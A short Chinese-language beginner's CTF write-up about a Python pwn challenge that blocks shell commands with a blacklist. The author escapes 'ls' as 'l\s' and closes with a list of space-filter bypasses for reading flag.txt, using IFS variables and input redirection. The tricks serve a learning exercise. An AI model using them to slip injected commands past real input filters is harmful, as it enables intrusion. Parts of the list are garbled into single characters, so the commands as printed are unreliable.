我开始入门pwn了,可能有些地方讲的不是很清楚,如果有讲错的地方,各位大佬一定要指点指点我。
下载完后打开附件
发现是python代码,blacklist是黑名单,所以这里我们要想办法绕过这个黑名单
这里我通过l\s绕过了ls的检测,后面也打算这样绕过
但这里好像还是被检查到了,自己看了一下代码,发现是空格也被过滤了,需要转义一下
尝试了很多种绕过方法,终于成功了。
这里顺便总结一下有哪些绕过方法
cat flag.txt
cat
I
F
S
f
l
a
g
.
t
x
t
c
a
t
{IFS}flag.txt cat
IFSflag.txtcatIFS$9flag.txt
cat<flag.txt
cat<>flag.txt